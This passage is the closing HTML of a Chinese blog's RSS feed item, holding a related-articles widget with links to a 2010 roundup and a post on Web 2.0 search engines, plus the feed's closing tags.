                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">2010大盘点《盛世狂欢》- Via AiZaoBao</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="Web2.0时代搜索引擎该进化了" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fweb2-0-search-engine-evolution%2F&from=http%3A%2F%2Fwww.fendou.info%2Faurora-ie-0day-shellcode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9293018.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">Web2.0时代搜索引擎该进化了</font>
                    </a>
                </td>
        </tr>
    
    <tr>
        <td colspan="5" align="right">
            <a style="text-decoration: none !important;" href="http://www.wumii.com/widget/relatedItems" target="_blank" title="无觅相关文章插件">
                <font size="-1" color="#bbbbbb" style="display: block !important; font-family: arial !important; padding: 5px 0 !important; font-size: 12px !important; color: #bbb !important;">无觅</font>
            </a>
        </td>
    </tr>
</table>]]></content:encoded>
			<wfw:commentRss>http://www.fendou.info/aurora-ie-0day-shellcode/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

